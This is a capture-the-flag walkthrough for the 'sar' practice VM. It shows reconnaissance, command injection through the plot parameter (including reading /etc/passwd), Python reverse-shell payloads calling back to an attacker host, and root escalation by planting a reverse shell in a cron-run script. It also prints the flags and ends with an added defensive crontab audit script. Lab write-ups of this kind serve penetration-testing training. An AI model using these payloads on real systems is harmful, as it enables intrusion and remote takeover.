Take down “sar” machine


Target Machine IP Address:  
My Machine IP Address:


Boot to Root
1. To get user flag
2. To get root flag
3. To get root access


Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.



You can download the machine from here.


To capture the target IP address:

sudo arp-scan --interface=vboxnet0
$ sudo arp-scan --interface=vboxnet0
[sudo] password for researcher: 
Interface: vboxnet0, type: EN10MB, MAC: 0a:00:27:00:00:00, IPv4:
WARNING: host part of is non-zero
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
08:00:27:72:a6:c8 PCS Systemtechnik GmbH
08:00:27:e7:60:30 PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.030 seconds (126.11 hosts/sec). 2 responded

Target IP:

$ nmap -sC -sV -p- -Pn -o nmap.log
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 23:23 IST
Nmap scan report for
Host is up (0.0024s latency).
Not shown: 65534 closed ports
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.80 seconds



In the web application you will see the index.php?plot URL parameter.

http://<ipaddr>/index.php?plot=;<command-here> will execute the command you entered. After the command injection, press "select # host"; your command's output will then appear at the bottom of the scroll screen.

;cat%20/etc/passwd

Since we can execute code, we will try to get a reverse connection…

On Browser:

;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.1%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

On Kali Linux Machine:

nc -lvp 1234

cd /home/love/Desktop;cat user.txt

user flag:  427a7e47deb4a8649c7cab38df232b52

python3 -c "import pty;pty.spawn('/bin/bash')";
export TERM=xterm

It is almost a ritual for me to upload linpeas.sh to the /tmp folder of the victim machine; its output shows me possible privilege escalation paths toward root access and the root flag.

Out of all the information we got, /var/spool/cron/crontab looks very promising. Let's check the crontab entries…

1. crontab -l   #no entry 
2. cat /etc/crontab

*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
cd /var/www/html 
ls -lah
cat write.sh
touch /tmp/gateway   #we need to add a reverse shell here
Python reverse shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Next, we wait for the reverse connection on Kali Linux on port 9000.

On Kali Linux:

nc -lvp 9000

root flag: 66f93d6b2ca96c9ad78a8a9ba0008e99
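
A defender-side check for the cron misconfiguration used above, as an added example that is not part of the original write-up: it audits /etc/crontab-format text for root jobs whose scripts, scripts they call by path, or containing directories can be modified by a non-root user. The function names, the trusted_uid parameter and the path-following heuristic are assumptions of this example.

```python
import os, re, shlex, stat

def risky(path, trusted_uid=0):
    """Return why a user other than trusted_uid could modify path, else None."""
    st = os.stat(path)
    if st.st_uid != trusted_uid:
        return "owned by uid %d" % st.st_uid
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group- or world-writable"
    return None

def invoked(shell_text, cwd):
    """Heuristic: list (path, cwd) for commands run by path, tracking `cd`."""
    found = []
    for part in re.split(r"&&|\|\||;|\n", shell_text):
        try:
            words = [w for w in shlex.split(part, comments=True) if w != "sudo"]
        except ValueError:      # unbalanced quotes: skip what we cannot parse
            continue
        if len(words) > 1 and words[0] == "cd":
            cwd = os.path.join(cwd, words[1])
        elif words and "/" in words[0]:
            found.append((os.path.normpath(os.path.join(cwd, words[0])), cwd))
    return found

def audit_crontab(text, trusted_uid=0):
    """Findings for root jobs in /etc/crontab-format text (user is field 6)."""
    findings = []
    for line in text.splitlines():
        f = line.split(None, 6)
        if line.lstrip().startswith("#") or len(f) < 7 or f[5] != "root":
            continue
        seen, queue = set(), invoked(f[6], "/")
        while queue:
            path, cwd = queue.pop()
            if path in seen or not os.path.isfile(path):
                continue
            seen.add(path)
            # A writable script or a writable parent directory both let a
            # lower-privileged user change what root executes.
            for target in (path, os.path.dirname(path)):
                why = risky(target, trusted_uid)
                if why and (target, why) not in findings:
                    findings.append((target, why))
            with open(path, errors="replace") as fh:
                queue.extend(invoked(fh.read(), cwd))   # follow nested scripts
    return findings

if __name__ == "__main__" and os.path.exists("/etc/crontab"):
    for target, why in audit_crontab(open("/etc/crontab").read()):
        print("%s: %s" % (target, why))
```

Run it as root so every script is readable; any finding means a root cron job depends on a file that should be owned by root with mode 755 or stricter, and kept outside the web root.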

